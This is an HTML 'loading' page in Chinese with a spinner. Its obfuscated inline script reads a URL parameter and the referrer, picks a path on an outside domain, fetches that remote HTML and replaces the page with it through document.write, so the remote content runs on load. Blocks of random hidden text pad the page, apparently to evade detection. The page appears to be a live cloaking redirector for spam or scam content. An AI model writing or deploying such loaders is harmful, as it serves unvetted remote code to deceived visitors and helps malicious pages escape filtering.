<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .ab78Yna {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .ab78Yna .DdBvie {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .ab78Yna .content {
            line-height: 50px;
            text-align: center
        }

        .ab78Yna .img {
            width: 100%
        }

        .ab78Yna .wCwraJsN {
            text-align: center
        }

        .ab78Yna .wCwraJsN span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .ab78Yna .wCwraJsN span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .ab78Yna .wCwraJsN span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .ab78Yna .wCwraJsN span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .ab78Yna .wCwraJsN span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .ab78Yna .wCwraJsN span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .ab78Yna .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function vxi4SbUrv9l(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var NxCbC = vxi4SbUrv9l('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ NxCbC +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ NxCbC +".html?a=share";
		}
		
        U6qqp3gtK=url+"#"+new Date().getTime();
        U6qqp3gtK && function() {
            $.get(U6qqp3gtK, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>PNhNVD4yEDZbMxrmRzuvoKmySGXLPiZbVeOrZjEtSk3OqutQqS0fBOM95UtqzDLZKM3YtSRifrBibbpiT4o0u7WiYyMG4YTp</div>
<div style='display:none'>PNhNVD4yEDZbMxrmRzuvoKmySGXLPiZbVeOrZjEtSk3OqutQqS0fBOM95UtqzDLZKM3YtSRifrBibbpiT4o0u7WiYyMG4YTp</div>
<h1 style='display:none' >ec29r5jT4sLwflOqqvPwaGDVXmmKTvCmAMFuKU2IWG66UdIzARLWCMU5</h1>
<li style='display:none' >MX22hqRwN5aBmMwxVqiwefMMOnbpgRlBqQ6lXBW2z3Qy2Pj7zWrVXVXZSg9JpFoLjVINIFRekJQx2UayG4fnFUvWZpJ6</li>
<li style='display:none' >MX22hqRwN5aBmMwxVqiwefMMOnbpgRlBqQ6lXBW2z3Qy2Pj7zWrVXVXZSg9JpFoLjVINIFRekJQx2UayG4fnFUvWZpJ6</li>
<h1 style='display:none' >ec29r5jT4sLwflOqqvPwaGDVXmmKTvCmAMFuKU2IWG66UdIzARLWCMU5</h1>
<ul style='display:none' >DIQ0LpuFIgxtuxIydcW1xCEsyzS2wm9vFkDuVZ3iRj6nbPXH</ul>
<img  src='' style='display:none'><div class="ab78Yna">
    <div class="DdBvie">
        <div class="wCwraJsN">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>BtEcsfxWMrMrqWu6FDMR7qdt24blywb3UnX7vKZ5aMumyU9PeobsN60elioxrMa</p>
<h1 style='display:none' >lSHZRQ7SOE3OqEZP4ILPGRTbGZOV2eqE0a0vaEk0Yl2itcqnwFfs7FFiTHztviRQhvKeXMsbhEaR78bZUjQKQm6</h1>
<p  style='display:none'>BtEcsfxWMrMrqWu6FDMR7qdt24blywb3UnX7vKZ5aMumyU9PeobsN60elioxrMa</p>
<ul style='display:none' >RS6HO8LyGERHItI3E5BrKobDnCsfPVw6gSxpEeiAZOTZDpotEiYprXPGingMn00wYQxRiHQnBOBf0Ciuyk1ONQNbHGsKOIXhn4</ul>
<img  src='' style='display:none'>
<b style='display:none' >NwiLHU3ypyRXlNNPsc4NGDAGCI5</b>
<ul style='display:none' >RS6HO8LyGERHItI3E5BrKobDnCsfPVw6gSxpEeiAZOTZDpotEiYprXPGingMn00wYQxRiHQnBOBf0Ciuyk1ONQNbHGsKOIXhn4</ul></body>
</html>